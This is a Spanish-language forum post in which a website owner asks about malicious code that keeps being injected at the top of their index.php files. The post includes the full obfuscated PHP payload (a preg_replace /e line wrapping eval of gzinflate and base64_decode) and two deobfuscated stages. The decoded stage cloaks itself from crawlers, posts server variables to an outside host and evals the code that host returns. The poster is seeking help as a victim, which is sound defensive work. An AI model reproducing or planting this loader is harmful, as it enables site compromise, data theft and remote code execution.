Saludos, he estado teniendo problemas con un ataque con una periodicidad, lo que hace es modificar mis archivos index.php y le incrusta al inicio del archivo este script:
///////////////////////////////////////////////
Código PHP:
<?php error_reporting(0); preg_replace("/.*/e","eval(gzinflate(base64_decode('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')));",""); ?>
////////////////////////////////////////////////
En mi primer desofuscación obtengo este script:
////////////////////////////////////////
Código PHP:
function dgeoig41383($str) {
$a = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";
$b = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";
return $b($a($str));
}
/////////////////////////////////////////
En mi segunda desofuscación obtengo este script:
/////////////////////////////////////////
Código PHP:
<?php ?><?php
error_reporting(0);
if (!$kjdke_b) {
global $kjdke_b;
$kjdke_b = 1;
$bkljg = $_SERVER["HTTP_USER_AGENT"];
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress" . "integromedb", "SISTRIX", "Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS");
if (!($_GET['df'] === "2") and !($_POST['dl'] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['condtions']) or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1") or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1"))) {
} else {
foreach ($_SERVER as $ndbv => $cbcd) {
$data_nfdh.= "&REM_" . $ndbv . "='" . base64_encode($cbcd) . "'";
}
$context_jhkb = stream_context_create(array('http' => array('timeout' => '15', 'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9
Connection: Close
", 'method' => 'POST', 'content' => "REM_REM='1'" . $data_nfdh)));
$vkfu = file_get_contents("http://hcolina.getce.com/session.php?id", false, $context_jhkb);
if ($vkfu) {
eval($vkfu);
} else {
ob_start();
if (!@headers_sent()) {
@setcookie("condtions", "2", time() + 172800);
} else {
echo "<script>document.cookie='condtions=2; path=/; expires=" . date('D, d-M-Y H:i:s', time() + 172800) . " GMT;';</script>";
};
};
}
}
?>
/////////////////////////////////////////
Alguien sabe algo de este ataque, información que me puedan dar seria excelente.
gracias.